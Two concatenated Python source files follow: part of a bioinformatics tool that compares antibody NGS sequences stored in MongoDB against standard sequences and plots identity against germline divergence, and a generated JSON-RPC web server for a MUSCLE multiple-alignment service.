parser.add_argument('-N', '--nucleotide', dest='is_aa', action='store_false', default=True,
help="Use nucleotide sequences for alignment. Default is amino acid sequences. \
Ensure standard format matches.")
parser.add_argument('-x', '--xmin', dest='x_min', type=int, default=-1,
help="Minimum X-axis (germline divergence) value for the AbCompare plot. Default is -1.")
parser.add_argument('-X', '--xmax', dest='x_max', type=int, default=35,
help="Maximum X-axis (germline divergence) value for the AbCompare plot. Default is 35.")
parser.add_argument('-y', '--ymin', dest='y_min', type=int, default=65,
help="Minimum Y-axis (mAb identity) value for the AbCompare plot. Default is 65.")
parser.add_argument('-Y', '--ymax', dest='y_max', type=int, default=101,
help="Maximum Y-axis (mAb identity) value for the AbCompare plot. Default is 101.")
parser.add_argument('-g', '--gridsize', dest='gridsize', type=int, default=0,
help="Gridsize for the AbFinder hexbin plot. \
Default is 36 for amino acid sequences and 50 for nucleotide sequences.")
parser.add_argument('--colormap', dest='colormap', default='Blues',
help="Colormap to be used in the AbFinder hexbin plots. \
Can accept a matplotlib cmap or the name of one of matplotlib's builtin cmaps. \
Default is 'Blues'.")
parser.add_argument('--mincount', dest='mincount', default=3, type=int,
help="Minimum number of sequences in a hexbin for that hexbin to be colored. \
Default is 3.")
parser.add_argument('--skip-padding', dest='remove_padding', default=True, action='store_false',
help="If set, will not remove padding field from MongoDB.")
parser.add_argument('-D', '--debug', dest="debug", action='store_true', default=False,
help="If set, will write all failed/exception sequences to file \
and should give more informative errors.")
return parser
class Args(object):
def __init__(self, db=None, collection=None,
output=None, temp=None, log=None, cluster=False,
ip='localhost', port=27017, user=None, password=None, update=True,
standard=None, chain='heavy', is_aa=True,
x_min=-1, x_max=35, y_min=65, y_max=101, gridsize=0, mincount=3,
colormap='Blues', debug=False):
super(Args, self).__init__()
if not all([db, output, temp, standard]):
err = 'You must provide a MongoDB database name, output and temp directories, \
and a file containing one or more comparison (standard) sequences in FASTA format.'
raise RuntimeError(err)
self.db = db
self.collection = collection
self.output_dir = output
self.temp_dir = temp
self.log = log
self.cluster = bool(cluster)
self.ip = ip
self.port = int(port)
self.user = user
self.password = password
self.standard = standard
if chain not in ['heavy', 'kappa', 'lambda', 'light']:
err = 'Please select an appropriate chain. \
Valid choices are: heavy, light, kappa and lambda.'
raise RuntimeError(err)
self.chain = chain
self.update = bool(update)
self.is_aa = bool(is_aa)
self.x_min = int(x_min)
self.x_max = int(x_max)
self.y_min = int(y_min)
self.y_max = int(y_max)
self.gridsize = int(gridsize)
mincount = int(mincount)
self.colormap = colormap
self.debug = bool(debug)
# ================================================
#
# FILES AND DIRECTORIES
#
# ================================================
def make_directories(args):
for d in [args.output_dir, args.temp_dir]:
if d:
_make_direc(d, args)
def _make_direc(d, args):
if not os.path.exists(d):
os.makedirs(d)
if args.cluster:
cmd = 'sudo chmod 777 {}'.format(d)
p = sp.Popen(cmd, shell=True, stdout=sp.PIPE, stderr=sp.PIPE)
stdout, stderr = p.communicate()
def get_standards(args):
standards = []
for s in SeqIO.parse(open(args.standard, 'r'), 'fasta'):
standards.append(s)
return standards
def get_chain(args):
if args.chain == 'light':
return ['kappa', 'lambda']
return [args.chain, ]
def get_sequences(db, collection, temp_dir, args):
files = []
fastas = []
chunksize = 1000
seq_counter = 0
total_seq_counter = 0
query_results = query(db, collection, args)
iden_field = 'aa_identity' if args.is_aa else 'nt_identity'
vdj_field = 'vdj_aa' if args.is_aa else 'vdj_nt'
for seq in query_results:
fastas.append('>{}_{}\n{}'.format(seq['seq_id'], seq[iden_field]['v'], seq[vdj_field]))
seq_counter += 1
total_seq_counter += 1
if seq_counter == chunksize:
files.append(write_to_temp_file(fastas, temp_dir))
fastas = []
seq_counter = 0
if fastas:
files.append(write_to_temp_file(fastas, temp_dir))
return files
def write_to_temp_file(fastas, temp_dir):
tfile = tempfile.NamedTemporaryFile(dir=temp_dir, delete=False)
tfile.write('\n'.join(fastas))
tfile.close()
return tfile.name
def clean_up(files):
for f in files:
os.unlink(f)
# ================================================
#
# MONGO
#
# ================================================
def query(db, collection, args):
coll = db[collection]
chain = get_chain(args)
mongodb.index(db, collection, ['chain'])
print_query_info()
iden_field = 'aa_identity.v' if args.is_aa else 'nt_identity.v'
vdj_field = 'vdj_aa' if args.is_aa else 'vdj_nt'
return coll.find({'chain': {'$in': chain}, 'prod': 'yes'}, {'_id': 0, 'seq_id': 1, iden_field: 1, vdj_field: 1})
def chunker(l, n):
'Generator that produces n-length chunks from iterable l.'
for i in xrange(0, len(l), n):
yield l[i:i + n]
def update_db(db, standard, scores, collection, args):
db = mongodb.get_db(args.db, args.ip, args.port, args.user, args.password)
print_index_info()
mongodb.index(db, collection, ['seq_id'])
print_update_info()
start = time.time()
conn = mongodb.get_connection(args.ip, args.port,
args.user, args.password)
mongo_version = conn.server_info()['version']
standard = standard.replace('.', '_')
g = scores.groupby('identity')
groups = regroup(g.groups)
for g in range(0, len(groups), args.update_threads):
tlist = []
for group in groups[g:g + args.update_threads]:
t = Thread(target=update, args=(db, collection, group, standard, mongo_version, args))
t.start()
tlist.append(t)
for t in tlist:
t.join()
progbar.progress_bar(g + args.update_threads, len(groups))
# if platform.system().lower() == 'darwin' or args.debug or args.single_process_update:
# for i, group in enumerate(groups):
# update(db, collection, group, standard, mongo_version, args)
# progbar.progress_bar(i, len(groups))
# else:
# p = mp.Pool(processes=25)
# async_results = []
# for group in groups:
# async_results.append(p.apply_async(update, args=(db, collection, group, standard, mongo_version, args)))
# monitor_update(async_results)
# p.close()
# p.join()
print('')
run_time = time.time() - start
logger.info('Updating took {} seconds. ({} sequences per second)'.format(round(run_time, 2),
round(len(scores) / run_time, 1)))
def update(db, collection, data, standard, version, args):
db = mongodb.get_db(args.db, args.ip, args.port, args.user, args.password)
coll = db[collection]
score = data[0]
ids = data[1]
mab_id_field = 'mab_identity_aa' if args.is_aa else 'mab_identity_nt'
if int(version.split('.')[0]) < 3:
result = coll.update({'seq_id': {'$in': ids}},
{'$set': {'{}.{}'.format(mab_id_field, standard.lower()): float(score)}},
multi=True)
else:
result = coll.update_many({'seq_id': {'$in': ids}},
{'$set': {'{}.{}'.format(mab_id_field, standard.lower()): float(score)}})
if args.debug:
print('matched: {}'.format(result.matched_count))
print('modified: {}'.format(result.modified_count))
def monitor_update(results):
finished = 0
jobs = len(results)
while finished < jobs:
time.sleep(1)
finished = len([r for r in results if r.ready()])
progbar.progress_bar(finished, jobs)
progbar.progress_bar(finished, jobs)
def regroup(oldgs):
newgs = []
for og in oldgs:
if len(oldgs[og]) <= 500:
newgs.append((og, oldgs[og]))
else:
for ng in chunker(oldgs[og], 500):
newgs.append((og, ng))
return newgs
# ================================================
#
# FIGURES
#
# ================================================
def make_figure(standard_id, scores, collection, args):
print_fig_info()
sns.set_style('white')
fig_file = os.path.join(args.output_dir, '{0}_{1}_{2}.pdf'.format(args.db, collection, standard_id))
x = list(scores['germ_divergence'].values)
y = list(scores['identity'].values)
xy_vals = zip(x, y)
trunc_xy_vals = [v for v in xy_vals if v[0] <= args.x_max and v[1] >= args.y_min]
x = [v[0] for v in trunc_xy_vals]
y = [v[1] for v in trunc_xy_vals]
# To make sure the gridsize is correct (since it's based on the actual values)
# I need to add a single value near the max and min of each axis.
# They're added just outside the visible plot, so there's no effect on the plot.
x.extend([args.x_min - 1, args.x_max + 1])
y.extend([args.y_min - 1, args.y_max + 1])
# plot params
cmap = color.get_cmap(args.colormap)
plt.subplots_adjust(hspace=0.95)
plt.subplot(111)
plt.hexbin(x, y, bins='log', cmap=cmap, mincnt=3, gridsize=set_gridsize(args))
plt.title(standard_id, fontsize=18)
# set and label axes
plt.axis([args.x_min, args.x_max, args.y_min, args.y_max])
plt.xlabel('Germline divergence')
plt.ylabel('{0} identity'.format(standard_id))
# make and label the colorbar
cb = plt.colorbar()
cb.set_label('Sequence count (log10)', labelpad=10)
# save figure and close
plt.savefig(fig_file)
plt.close()
def set_gridsize(args):
if args.gridsize:
return args.gridsize
elif args.is_aa:
return 36
return 50
# ================================================
#
# PRINTING
#
# ================================================
def print_abfinder_start():
logger.info('')
logger.info('')
logger.info('')
logger.info('-' * 25)
logger.info('ABFINDER')
logger.info('-' * 25)
def print_standards_info(standards):
logger.info('')
logger.info('Found {} standard sequence(s):'.format(len(standards)))
logger.info(', '.join([s.id for s in standards]))
def print_collections_info(collections):
logger.info('')
logger.info('Found {} collection(s):'.format(len(collections)))
logger.info(', '.join(collections))
def print_single_standard(standard):
standard_id_string = '{}'.format(standard.id)
logger.info('')
logger.info(standard_id_string)
logger.info('-' * len(standard_id_string))
def print_single_collection(collection):
logger.info('')
logger.info('')
logger.info(collection)
logger.info('-' * len(collection))
def print_query_info():
logger.info('Querying for comparison sequences...')
def print_remove_padding():
logger.info('')
logger.info('Removing MongoDB padding...')
def print_fig_info():
logger.info('Making identity/divergence figure...')
def print_index_info():
logger.info('Indexing the MongoDB collection...')
def print_update_info():
logger.info('Updating the MongoDB database with identity scores:')
# ================================================
#
# IDENTITY JOBS
#
# ================================================
def run_jobs(files, standard, args):
logger.info('Running AbCompare...')
if args.cluster:
return _run_jobs_via_celery(files, standard, args)
else:
return _run_jobs_via_multiprocessing(files, standard, args)
def _run_jobs_via_multiprocessing(files, standard, args):
from abtools.queue.tasks import identity
results = []
if args.debug:
for f in files:
results.extend(identity(f, standard, args.is_aa, args.debug))
else:
p = mp.Pool()
async_results = []
for f in files:
async_results.append(p.apply_async(identity, (f, standard, args.is_aa)))
monitor_mp_jobs(async_results)
for a in async_results:
results.extend(a.get())
p.close()
p.join()
ids = [r[0] for r in results]
identities = pd.Series([r[1] for r in results], index=ids)
divergences = pd.Series([100. - r[2] for r in results], index=ids)
d = {'identity': identities, 'germ_divergence': divergences}
df = pd.DataFrame(d)
return df
def monitor_mp_jobs(results):
finished = 0
jobs = len(results)
while finished < jobs:
time.sleep(1)
ready = [ar for ar in results if ar.ready()]
finished = len(ready)
update_progress(finished, jobs)
print('')
def _run_jobs_via_celery(files, standard, args):
from abtools.queue.tasks import identity
async_results = []
for f in files:
async_results.append(identity.delay(f, standard, args.is_aa))
succeeded, failed = monitor_celery_jobs(async_results)
scores = []
for s in succeeded:
scores.extend(s.get())
ids = [r[0] for r in scores]
identities = pd.Series([r[1] for r in scores], index=ids)
divergences = pd.Series([r[2] for r in scores], index=ids)
d = {'identity': identities, 'germ_divergence': divergences}
df = pd.DataFrame(d)
return df
def monitor_celery_jobs(results):
finished = 0
jobs = len(results)
while finished < jobs:
time.sleep(1)
succeeded = [ar for ar in results if ar.successful()]
failed = [ar for ar in results if ar.failed()]
finished = len(succeeded) + len(failed)
update_progress(finished, jobs, failed=len(failed))
print('')
return succeeded, failed
def update_progress(finished, jobs):
pct = int(100. * finished / jobs)
ticks = pct / 2
spaces = 50 - ticks
prog_bar = '\r({}/{}) |{}{}| {}%'.format(finished, jobs, '|' * ticks, ' ' * spaces, pct)
sys.stdout.write(prog_bar)
sys.stdout.flush()
def run(**kwargs):
'''
Mines NGS datasets for identity to known antibody sequences.
All of ``db``, ``output``, ``temp`` and ``standard`` are required.
Args:
db (str): Name of a MongoDB database to query.
collection (str): Name of a MongoDB collection. If not provided, all collections
in ``db`` will be processed iteratively.
output_dir (str): Path to the output directory, into which identity/divergence
figures will be deposited.
temp_dir (str): Path to a temporary directory.
log (str): Path to a log file. If not provided, log information will not be retained.
ip (str): IP address of the MongoDB server. Default is ``localhost``.
port (str): Port of the MongoDB server. Default is ``27017``.
user (str): Username with which to connect to the MongoDB database. If either
of ``user`` or ``password`` is not provided, the connection to the MongoDB
database will be attempted without authentication.
password (str): Password with which to connect to the MongoDB database. If either
of ``user`` or ``password`` is not provided, the connection to the MongoDB
database will be attempted without authentication.
standard (path): Path to a FASTA-formatted file containing one or more 'standard'
sequences, against which the NGS sequences will be compared.
chain (str): Antibody chain. Choices are 'heavy', 'kappa', 'lambda', and 'light'.
Default is 'heavy'. Only NGS sequences matching ``chain`` (with 'light' covering
both 'kappa' and 'lambda') will be compared to the ``standard`` sequences.
update (bool): If ``True``, the MongoDB record for each NGS sequence will be updated
with identity information for each standard. If ``False``, the updated is skipped.
Default is ``True``.
is_aa (bool): If ``True``, the ``standard`` sequences are amino acid sequences. If
``False``, they are nucleotide seqeunces. Default is ``False``.
x_min (int): Minimum x-axis value on identity/divergence plots.
x_max (int): Maximum x-axis value on identity/divergence plots.
y_min (int): Minimum y-axis value on identity/divergence plots.
y_max (int): Maximum y-axis value on identity/divergence plots.
gridsize (int): Relative size of hexbin grids.
mincount (int): Minimum number of sequences in a hexbin for the bin to be colored.
Default is 3.
colormap (str, colormap): Colormap to be used for identity/divergence plots.
Default is ``Blues``.
debug (bool): If ``True``, more verbose logging.
'''
args = Args(**kwargs)
global logger
logger = log.get_logger('abfinder')
main(args)
def run_standalone(args):
logfile = args.log if args.log else os.path.join(args.output_dir, 'abfinder.log')
log.setup_logging(logfile)
global logger
logger = log.get_logger('abfinder')
main(args)
def main(args):
print_abfinder_start()
db = mongodb.get_db(args.db, args.ip, args.port,
args.user, args.password)
make_directories(args)
standards = get_standards(args)
print_standards_info(standards)
collections = mongodb.get_collections(db, args.collection, prefix=args.collection_prefix)
print_collections_info(collections)
for collection in collections:
indexed = False
print_single_collection(collection)
if args.remove_padding:
print_remove_padding()
mongodb.remove_padding(db, collection)
seq_files = get_sequences(db, collection, args.temp_dir, args)
for standard in standards:
print_single_standard(standard)
scores = run_jobs(seq_files, standard, args)
if args.output_dir:
make_figure(standard.id, scores, collection, args)
if args.update:
if not indexed:
mongodb.index(db, collection, 'seq_id')
indexed = True
update_db(db, standard.id, scores, collection, args)
clean_up(seq_files)
if __name__ == '__main__':
parser = parse_args()
args = parser.parse_args()
logfile = args.log if args.log else os.path.join(args.output_dir, 'abfinder.log')
log.setup_logging(logfile)
logger = log.get_logger('abfinder')
main(args)
|
msa_muscleServer.py
|
#!/usr/bin/env python
from wsgiref.simple_server import make_server
import sys
import json
import traceback
import datetime
from multiprocessing import Process
from getopt import getopt, GetoptError
from jsonrpcbase import JSONRPCService, InvalidParamsError, KeywordError,\
JSONRPCError, ServerError, InvalidRequestError
from os import environ
from ConfigParser import ConfigParser
from biokbase import log
import biokbase.nexus
import requests as _requests
import urlparse as _urlparse
import random as _random
import os
DEPLOY = 'KB_DEPLOYMENT_CONFIG'
SERVICE = 'KB_SERVICE_NAME'
# Note that the error fields do not match the 2.0 JSONRPC spec
def get_config_file():
return environ.get(DEPLOY, None)
def get_service_name():
return environ.get(SERVICE, None)
def get_config():
if not get_config_file():
return None
retconfig = {}
config = ConfigParser()
config.read(get_config_file())
for nameval in config.items(get_service_name() or 'msa_muscle'):
retconfig[nameval[0]] = nameval[1]
return retconfig
config = get_config()
from msa_muscle.msa_muscleImpl import msa_muscle
impl_msa_muscle = msa_muscle(config)
class JSONObjectEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, set):
return list(obj)
if isinstance(obj, frozenset):
return list(obj)
if hasattr(obj, 'toJSONable'):
return obj.toJSONable()
return json.JSONEncoder.default(self, obj)
sync_methods = {}
async_run_methods = {}
async_check_methods = {}
async_run_methods['msa_muscle.build_msa_async'] = ['msa_muscle', 'build_msa']
async_check_methods['msa_muscle.build_msa_check'] = ['msa_muscle', 'build_msa']
sync_methods['msa_muscle.build_msa'] = True
class AsyncJobServiceClient(object):
def __init__(self, timeout=30 * 60, token=None,
ignore_authrc=True, trust_all_ssl_certificates=False):
url = environ.get('KB_JOB_SERVICE_URL', None)
if url is None and config is not None:
url = config.get('job-service-url')
if url is None:
raise ValueError('Neither \'job-service-url\' parameter is defined in '+
'configuration nor \'KB_JOB_SERVICE_URL\' variable is defined in system')
scheme, _, _, _, _, _ = _urlparse.urlparse(url)
if scheme not in ['http', 'https']:
raise ValueError(url + " isn't a valid http url")
self.url = url
self.timeout = int(timeout)
self._headers = dict()
self.trust_all_ssl_certificates = trust_all_ssl_certificates
if token is None:
raise ValueError('Authentication is required for async methods')
self._headers['AUTHORIZATION'] = token
if self.timeout < 1:
raise ValueError('Timeout value must be at least 1 second')
def _call(self, method, params, json_rpc_call_context = None):
arg_hash = {'method': method,
'params': params,
'version': '1.1',
'id': str(_random.random())[2:]
}
if json_rpc_call_context:
arg_hash['context'] = json_rpc_call_context
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
ret = _requests.post(self.url, data=body, headers=self._headers,
timeout=self.timeout,
verify=not self.trust_all_ssl_certificates)
if ret.status_code == _requests.codes.server_error:
if 'content-type' in ret.headers and ret.headers['content-type'] == 'application/json':
err = json.loads(ret.text)
if 'error' in err:
raise ServerError(**err['error'])
else:
raise ServerError('Unknown', 0, ret.text)
else:
raise ServerError('Unknown', 0, ret.text)
if ret.status_code != _requests.codes.OK:
ret.raise_for_status()
resp = json.loads(ret.text)
if 'result' not in resp:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
return resp['result']
def run_job(self, run_job_params, json_rpc_call_context = None):
return self._call('KBaseJobService.run_job', [run_job_params], json_rpc_call_context)[0]
def check_job(self, job_id, json_rpc_call_context = None):
return self._call('KBaseJobService.check_job', [job_id], json_rpc_call_context)[0]
class JSONRPCServiceCustom(JSONRPCService):
def call(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in a JSON
string or None if there is none.
Arguments:
jsondata -- remote method call in jsonrpc format
"""
result = self.call_py(ctx, jsondata)
if result is not None:
return json.dumps(result, cls=JSONObjectEncoder)
return None
def _call_method(self, ctx, request):
"""Calls given method with given params and returns it value."""
method = self.method_data[request['method']]['method']
params = request['params']
result = None
try:
if isinstance(params, list):
# Does it have enough arguments?
if len(params) < self._man_args(method) - 1:
raise InvalidParamsError('not enough arguments')
# Does it have too many arguments?
if(not self._vargs(method) and len(params) >
self._max_args(method) - 1):
raise InvalidParamsError('too many arguments')
result = method(ctx, *params)
elif isinstance(params, dict):
# Do not accept keyword arguments if the jsonrpc version is
# not >=1.1.
if request['jsonrpc'] < 11:
raise KeywordError
result = method(ctx, **params)
else: # No params
result = method(ctx)
except JSONRPCError:
raise
except Exception as e:
# log.exception('method %s threw an exception' % request['method'])
# Exception was raised inside the method.
newerr = ServerError()
newerr.trace = traceback.format_exc()
newerr.data = e.__str__()
raise newerr
return result
def call_py(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in python
object format or None if there is none.
This method is same as call() except the return value is a python
object instead of JSON string. This method is mainly only useful for
debugging purposes.
"""
rdata = jsondata
# we already deserialize the json string earlier in the server code, no
# need to do it again
# try:
# rdata = json.loads(jsondata)
# except ValueError:
# raise ParseError
# set some default values for error handling
request = self._get_default_vals()
if isinstance(rdata, dict) and rdata:
# It's a single request.
self._fill_request(request, rdata)
respond = self._handle_request(ctx, request)
# Don't respond to notifications
if respond is None:
return None
return respond
elif isinstance(rdata, list) and rdata:
# It's a batch.
requests = []
responds = []
for rdata_ in rdata:
# set some default values for error handling
request_ = self._get_default_vals()
self._fill_request(request_, rdata_)
requests.append(request_)
for request_ in requests:
respond = self._handle_request(ctx, request_)
# Don't respond to notifications
if respond is not None:
responds.append(respond)
if responds:
return responds
# Nothing to respond.
return None
else:
# empty dict, list or wrong type
raise InvalidRequestError
def _handle_request(self, ctx, request):
"""Handles given request and returns its response."""
if self.method_data[request['method']].has_key('types'): # @IgnorePep8
self._validate_params_types(request['method'], request['params'])
result = self._call_method(ctx, request)
# Do not respond to notifications.
if request['id'] is None:
return None
respond = {}
self._fill_ver(request['jsonrpc'], respond)
respond['result'] = result
respond['id'] = request['id']
return respond
class MethodContext(dict):
def __init__(self, logger):
self['client_ip'] = None
self['user_id'] = None
self['authenticated'] = None
self['token'] = None
self['module'] = None
self['method'] = None
self['call_id'] = None
self['rpc_context'] = None
self._debug_levels = set([7, 8, 9, 'DEBUG', 'DEBUG2', 'DEBUG3'])
self._logger = logger
def log_err(self, message):
self._log(log.ERR, message)
def log_info(self, message):
self._log(log.INFO, message)
def log_debug(self, message, level=1):
if level in self._debug_levels:
pass
else:
level = int(level)
if level < 1 or level > 3:
raise ValueError("Illegal log level: " + str(level))
level = level + 6
self._log(level, message)
def set_log_level(self, level):
self._logger.set_log_level(level)
def get_log_level(self):
return self._logger.get_log_level()
def clear_log_level(self):
self._logger.clear_user_log_level()
def _log(self, level, message):
self._logger.log_message(level, message, self['client_ip'],
self['user_id'], self['module'],
self['method'], self['call_id'])
def getIPAddress(environ):
xFF = environ.get('HTTP_X_FORWARDED_FOR')
realIP = environ.get('HTTP_X_REAL_IP')
trustXHeaders = config is None or \
config.get('dont_trust_x_ip_headers') != 'true'
if (trustXHeaders):
if (xFF):
return xFF.split(',')[0].strip()
if (realIP):
return realIP.strip()
return environ.get('REMOTE_ADDR')
class Application(object):
# Wrap the wsgi handler in a class definition so that we can
# do some initialization and avoid regenerating stuff over
# and over
def logcallback(self):
self.serverlog.set_log_file(self.userlog.get_log_file())
def log(self, level, context, message):
self.serverlog.log_message(level, message, context['client_ip'],
context['user_id'], context['module'],
context['method'], context['call_id'])
def __init__(self):
submod = get_service_name() or 'msa_muscle'
self.userlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, changecallback=self.logcallback,
config=get_config_file())
self.serverlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, logfile=self.userlog.get_log_file())
self.serverlog.set_log_level(6)
self.rpc_service = JSONRPCServiceCustom()
self.method_authentication = dict()
self.rpc_service.add(impl_msa_muscle.build_msa,
name='msa_muscle.build_msa',
types=[basestring, basestring, basestring])
self.method_authentication['msa_muscle.build_msa'] = 'required'
self.auth_client = biokbase.nexus.Client(
config={'server': 'nexus.api.globusonline.org',
'verify_ssl': True,
'client': None,
'client_secret': None})
def __call__(self, environ, start_response):
# Context object, equivalent to the perl impl CallContext
ctx = MethodContext(self.userlog)
ctx['client_ip'] = getIPAddress(environ)
status = '500 Internal Server Error'
try:
body_size = int(environ.get('CONTENT_LENGTH', 0))
except (ValueError):
body_size = 0
if environ['REQUEST_METHOD'] == 'OPTIONS':
# we basically do nothing and just return headers
status = '200 OK'
rpc_result = ""
else:
request_body = environ['wsgi.input'].read(body_size)
try:
req = json.loads(request_body)
except ValueError as ve:
err = {'error': {'code': -32700,
'name': "Parse error",
'message': str(ve),
}
}
rpc_result = self.process_error(err, ctx, {'version': '1.1'})
else:
ctx['module'], ctx['method'] = req['method'].split('.')
ctx['call_id'] = req['id']
ctx['rpc_context'] = {'call_stack': [{'time':self.now_in_utc(), 'method': req['method']}]}
try:
token = environ.get('HTTP_AUTHORIZATION')
# parse out the method being requested and check if it
# has an authentication requirement
method_name = req['method']
if method_name in async_run_methods:
method_name = async_run_methods[method_name][0] + "." + async_run_methods[method_name][1]
if method_name in async_check_methods:
method_name = async_check_methods[method_name][0] + "." + async_check_methods[method_name][1]
auth_req = self.method_authentication.get(method_name,
"none")
if auth_req != "none":
if token is None and auth_req == 'required':
err = ServerError()
err.data = "Authentication required for " + \
"msa_muscle but no authentication header was passed"
raise err
elif token is None and auth_req == 'optional':
pass
else:
try:
user, _, _ = \
self.auth_client.validate_token(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
except Exception, e:
if auth_req == 'required':
err = ServerError()
err.data = \
"Token validation failed: %s" % e
raise err
if (environ.get('HTTP_X_FORWARDED_FOR')):
self.log(log.INFO, ctx, 'X-Forwarded-For: ' +
environ.get('HTTP_X_FORWARDED_FOR'))
method_name = req['method']
if method_name in async_run_methods or method_name in async_check_methods:
if method_name in async_run_methods:
orig_method_pair = async_run_methods[method_name]
else:
orig_method_pair = async_check_methods[method_name]
orig_method_name = orig_method_pair[0] + '.' + orig_method_pair[1]
if 'required' != self.method_authentication.get(orig_method_name, 'none'):
err = ServerError()
err.data = 'Async method ' + orig_method_name + ' should require ' + \
'authentication, but it has authentication level: ' + \
self.method_authentication.get(orig_method_name, 'none')
raise err
job_service_client = AsyncJobServiceClient(token = ctx['token'])
if method_name in async_run_methods:
run_job_params = {
'method': orig_method_name,
'params': req['params']}
if 'rpc_context' in ctx:
run_job_params['rpc_context'] = ctx['rpc_context']
job_id = job_service_client.run_job(run_job_params)
respond = {'version': '1.1', 'result': [job_id], 'id': req['id']}
rpc_result = json.dumps(respond, cls=JSONObjectEncoder)
status = '200 OK'
else:
job_id = req['params'][0]
job_state = job_service_client.check_job(job_id)
finished = job_state['finished']
if finished != 0 and 'error' in job_state and job_state['error'] is not None:
err = {'error': job_state['error']}
rpc_result = self.process_error(err, ctx, req, None)
else:
respond = {'version': '1.1', 'result': [job_state], 'id': req['id']}
rpc_result = json.dumps(respond, cls=JSONObjectEncoder)
status = '200 OK'
elif method_name in sync_methods or (method_name + '_async') not in async_run_methods:
self.log(log.INFO, ctx, 'start method')
rpc_result = self.rpc_service.call(ctx, req)
self.log(log.INFO, ctx, 'end method')
status = '200 OK'
else:
err = ServerError()
err.data = 'Method ' + method_name + ' cannot be run synchronously'
raise err
except JSONRPCError as jre:
err = {'error': {'code': jre.code,
'name': jre.message,
'message': jre.data
}
}
trace = jre.trace if hasattr(jre, 'trace') else None
rpc_result = self.process_error(err, ctx, req, trace)
except Exception, e:
err = {'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error ' +
'occurred',
}
}
rpc_result = self.process_error(err, ctx, req,
traceback.format_exc())
# print 'The request method was %s\n' % environ['REQUEST_METHOD']
# print 'The environment dictionary is:\n%s\n' % pprint.pformat(environ) @IgnorePep8
# print 'The request body was: %s' % request_body
# print 'The result from the method call is:\n%s\n' % \
# pprint.pformat(rpc_result)
if rpc_result:
response_body = rpc_result
else:
response_body = ''
response_headers = [
('Access-Control-Allow-Origin', '*'),
('Access-Control-Allow-Headers', environ.get(
'HTTP_ACCESS_CONTROL_REQUEST_HEADERS', 'authorization')),
('content-type', 'application/json'),
('content-length', str(len(response_body)))]
start_response(status, response_headers)
return [response_body]
def process_error(self, error, context, request, trace=None):
if trace:
self.log(log.ERR, context, trace.split('\n')[0:-1])
if 'id' in request:
error['id'] = request['id']
if 'version' in request:
error['version'] = request['version']
if 'error' not in error['error'] or error['error']['error'] is None:
error['error']['error'] = trace
elif 'jsonrpc' in request:
error['jsonrpc'] = request['jsonrpc']
error['error']['data'] = trace
else:
error['version'] = '1.0'
error['error']['error'] = trace
return json.dumps(error)
def now_in_utc(self):
# Taken from http://stackoverflow.com/questions/3401428/how-to-get-an-isoformat-datetime-string-including-the-default-timezone
dtnow = datetime.datetime.now()
dtutcnow = datetime.datetime.utcnow()
delta = dtnow - dtutcnow
hh,mm = divmod((delta.days * 24*60*60 + delta.seconds + 30) // 60, 60)
return "%s%+02d:%02d" % (dtnow.isoformat(), hh, mm)
application = Application()
# This is the uwsgi application dictionary. On startup uwsgi will look
# for this dict and pull its configuration from here.
# This simply lists where to "mount" the application in the URL path
#
# This uwsgi module "magically" appears when running the app within
# uwsgi and is not available otherwise, so wrap an exception handler
# around it
#
# To run this server in uwsgi with 4 workers listening on port 9999 use:
# uwsgi -M -p 4 --http :9999 --wsgi-file _this_file_
# To run a using the single threaded python BaseHTTP service
# listening on port 9999 by default execute this file
#
try:
import uwsgi
# Before we do anything with the application, see if the
# configs specify patching all std routines to be asynch
# *ONLY* use this if you are going to wrap the service in
# a wsgi container that has enabled gevent, such as
# uwsgi with the --gevent option
if config is not None and config.get('gevent_monkeypatch_all', False):
print "Monkeypatching std libraries for async"
from gevent import monkey
monkey.patch_all()
uwsgi.applications = {
'': application
}
except ImportError:
# Not available outside of wsgi, ignore
pass
_proc = None
def start_server(host='localhost', port=0, newprocess=False):
'''
By default, will start the server on localhost on a system assigned port
in the main thread. Excecution of the main thread will stay in the server
main loop until interrupted. To run the server in a separate process, and
thus allow the stop_server method to be called, set newprocess = True. This
will also allow returning of the port number.'''
global _proc
if _proc:
raise RuntimeError('server is already running')
httpd = make_server(host, port, application)
port = httpd.server_address[1]
print "Listening on port %s" % port
if newprocess:
_proc = Process(target=httpd.serve_forever)
_proc.daemon = True
_proc.start()
else:
httpd.serve_forever()
return port
def stop_server():
global _proc
_proc.terminate()
_proc = None
def process_async_cli(input_file_path, output_file_path, token):
exit_code = 0
with open(input_file_path) as data_file:
req = json.load(data_file)
if 'version' not in req:
req['version'] = '1.1'
if 'id' not in req:
req['id'] = str(_random.random())[2:]
ctx = MethodContext(application.userlog)
if token:
user, _, _ = application.auth_client.validate_token(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
if 'context' in req:
ctx['rpc_context'] = req['context']
ctx['CLI'] = 1
resp = None
try:
resp = application.rpc_service.call_py(ctx, req)
except JSONRPCError as jre:
trace = jre.trace if hasattr(jre, 'trace') else None
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': jre.code,
'name': jre.message,
'message': jre.data,
'error': trace}
}
except Exception, e:
trace = traceback.format_exc()
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error occurred',
'error': trace}
}
if 'error' in resp:
exit_code = 500
with open(output_file_path, "w") as f:
f.write(json.dumps(resp, cls=JSONObjectEncoder))
return exit_code
if __name__ == "__main__":
if len(sys.argv) >= 3 and len(sys.argv) <= 4 and os.path.isfile(sys.argv[1]):
token = None
if len(sys.argv) == 4:
if os.path.isfile(sys.argv[3]):
with open(sys.argv[3]) as token_file:
token = token_file.read()
else:
token = sys.argv[3]
sys.exit(process_async_cli(sys.argv[1], sys.argv[2], token))
try:
opts, args = getopt(sys.argv[1:], "", ["port=", "host="])
except GetoptError as err:
# print help information and exit:
print str(err) # will print something like "option -a not recognized"
sys.exit(2)
port = 9999
host = 'localhost'
for o, a in opts:
if o == '--port':
port = int(a)
elif o == '--host':
host = a
print "Host set to %s" % host
else:
assert False, "unhandled option"
start_server(host=host, port=port)
